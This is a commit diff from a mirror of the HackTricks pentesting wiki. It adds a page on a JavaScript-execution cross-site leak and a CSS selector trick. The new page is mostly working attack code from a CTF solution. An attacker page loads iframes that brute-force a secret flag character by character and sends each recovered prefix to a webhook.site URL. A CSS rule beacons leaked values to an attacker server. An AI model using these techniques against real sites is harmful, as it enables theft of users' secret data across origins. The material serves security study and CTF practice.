mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [#3759] No subject
This commit is contained in:
parent
58bf59d251
commit
008a035c94
4 changed files with 123 additions and 21 deletions
|
@ -592,6 +592,7 @@
|
|||
* [performance.now example](pentesting-web/xs-search/performance.now-example.md)
|
||||
* [performance.now + Force heavy task](pentesting-web/xs-search/performance.now-+-force-heavy-task.md)
|
||||
* [Event Loop Blocking + Lazy images](pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md)
|
||||
* [JavaScript Execution XS Leak](pentesting-web/xs-search/javascript-execution-xs-leak.md)
|
||||
* [CSS Injection](pentesting-web/xs-search/css-injection/README.md)
|
||||
* [CSS Injection Code](pentesting-web/xs-search/css-injection/css-injection-code.md)
|
||||
|
||||
|
|
|
@ -172,6 +172,18 @@ If the first URL was **successfully loaded**, then, when **changing** the **hash
|
|||
|
||||
Then, you can **distinguish between** a **correctly** loaded page or page that has an **error** when is accessed.
|
||||
|
||||
### Javascript Execution
|
||||
|
||||
* **Inclusion Methods**: Frames
|
||||
* **Detectable Difference**: Page Content
|
||||
* **More info**:
|
||||
* **Summary:** If the **page** is **returning** the **sensitive** content, **or** a **content** that can be **controlled** by the user. The user could set **valid JS code in the negative case**, an **load** each try inside **`<script>`** tags, so in **negative** cases attackers **code** is **executed,** and in **affirmative** cases **nothing** will be executed.
|
||||
* **Code Example:**
|
||||
|
||||
{% content-ref url="xs-search/javascript-execution-xs-leak.md" %}
|
||||
[javascript-execution-xs-leak.md](xs-search/javascript-execution-xs-leak.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### CORB - Onerror
|
||||
|
||||
* **Inclusion Methods**: HTML Elements
|
||||
|
|
|
@ -2,17 +2,13 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -102,6 +98,11 @@ No worries, just check the **output** because **you can see the flag there**.
|
|||
Other ways to access DOM parts with **CSS selectors**:
|
||||
|
||||
* **`.class-to-search:nth-child(2)`**: This will search the second item with class "class-to-search" in the DOM.
|
||||
* **`:empty`** selector: Used for example in [**this writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:** 
|
||||
|
||||
```css
|
||||
[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
|
||||
```
|
||||
|
||||
### Error based XS-Search
|
||||
|
||||
|
@ -137,7 +138,7 @@ Basically the main idea is to **use a custom font from an endpoint controlled by
|
|||
|
||||
When a **URL fragment targets an element**, the [**`:target`**](https://drafts.csswg.org/selectors-4/#the-target-pseudo) pseudo-class **can be used** to select it, but **`::target-text` does not match anything**. It only matches text that is itself targeted by the \[fragment].
|
||||
|
||||
Therefore, an attacker could use the **Scroll-to-text** fragment and if **something is found** with that text we can **load a resource** from the attackers server to indicate it: 
|
||||
Therefore, an attacker could use the **Scroll-to-text** fragment and if **something is found** with that text we can **load a resource** from the attackers server to indicate it:
|
||||
|
||||
```
|
||||
:target::before { content : url(target.png) }
|
||||
|
@ -387,16 +388,12 @@ div::-webkit-scrollbar:vertical {
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
92
pentesting-web/xs-search/javascript-execution-xs-leak.md
Normal file
92
pentesting-web/xs-search/javascript-execution-xs-leak.md
Normal file
|
@ -0,0 +1,92 @@
|
|||
# JavaScript Execution XS Leak
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
```javascript
|
||||
// Code that will try ${guess} as flag (need rest of the server code
|
||||
app.get('/guessing', function(req, res) {
|
||||
let guess = req.query.guess
|
||||
let page = `<html>
|
||||
<head>
|
||||
<script>
|
||||
function foo() {
|
||||
// If not the flag this will be executed
|
||||
window.parent.foo()
|
||||
}
|
||||
</script>
|
||||
<script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
|
||||
</head>
|
||||
<p>hello2</p>
|
||||
</html>`
|
||||
res.send(page)
|
||||
});
|
||||
```
|
||||
|
||||
Main page that generates iframes to the previous `/guessing` page to test each possibility
|
||||
|
||||
```html
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
let candidateIsGood = false;
|
||||
let candidate = ''
|
||||
let flag = 'bi0sctf{'
|
||||
let guessIndex = -1
|
||||
|
||||
let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
|
||||
|
||||
// this will get called from our iframe IF the candidate is WRONG
|
||||
function foo() {
|
||||
candidateIsGood = false
|
||||
}
|
||||
|
||||
timerId = setInterval(() => {
|
||||
if (candidateIsGood) {
|
||||
flag = candidate
|
||||
guessIndex = -1
|
||||
fetch('https://webhook.site/<yours-goes-here>?flag='+flag)
|
||||
}
|
||||
|
||||
//Start with true and will be change to false if wrong
|
||||
candidateIsGood = true
|
||||
guessIndex++
|
||||
if (guessIndex >= flagChars.length) {
|
||||
fetch('https://webhook.site/<yours-goes-here>')
|
||||
return
|
||||
}
|
||||
let guess = flagChars[guessIndex]
|
||||
candidate = flag + guess
|
||||
let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>`
|
||||
console.log('iframe: ', iframe)
|
||||
hack.innerHTML = iframe
|
||||
}
|
||||
, 500);
|
||||
</script>
|
||||
</head>
|
||||
<p>hello</p>
|
||||
<div id="hack">
|
||||
</div>
|
||||
</html>
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
Loading…
Reference in a new issue